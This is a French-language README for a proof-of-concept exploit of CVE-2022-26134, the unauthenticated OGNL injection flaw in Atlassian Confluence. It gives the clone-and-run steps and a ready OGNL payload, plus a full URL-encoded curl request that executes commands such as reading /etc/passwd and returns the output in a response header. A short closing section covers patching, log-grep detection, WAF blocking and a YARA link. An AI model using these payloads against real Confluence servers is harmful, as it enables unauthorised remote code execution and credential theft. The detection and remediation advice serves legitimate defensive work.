
Atlassian Confluence (CVE-2022-26134) - Vulnérabilité d'injection OGNL non authentifiée (RCE).
Script preuve de concept qui exploite la vulnérabilité d'exécution de code à distance affectant les produits Atlassian Confluence 7.18 et versions antérieures. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
Toutes les versions prises en charge de Confluence Server et Data Center sont concernées.
Les versions de Confluence Server et Data Center postérieures à 1.3.0 et antérieures à 7.18.1 sont concernées.
La vulnérabilité a un score CVSS de 10 sur 10 pour la criticité.
pip install -r requirements.txt
Clonez le dépôt :
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
Ensuite, vous pouvez exécuter l'exploit avec la commande de votre choix comme suit :
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Ensuite, le résultat de la commande sera reflété dans le paramètre X-Cmd-Response de l'en-tête de la réponse.
Suivez les recommandations officielles d'Atlassian :
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian a publié un avis de sécurité pour ses produits concernés par cette CVE, que vous pouvez lire ici. Pour résoudre le problème, vous devez mettre à niveau votre version de Confluence. La liste suggérée au moment de la publication est :
Confluence est un serveur Apache Tomcat dont les journaux se trouvent dans /opt/atlassian/confluence/logs. Vous pouvez utiliser des commandes comme grep pour rechercher les requêtes HTTP GET de payloads qui utilisent l'exécution Java pour exécuter des commandes. Par exemple :
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" dans catalina.out
Cette vulnérabilité affecte toutes les instances auto-hébergées. Si vous utilisez un WAF, vous pouvez bloquer les URL contenant ${.
YARA (par Volexity) : https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
UNIQUEMENT À DES FINS ÉDUCATIVES.
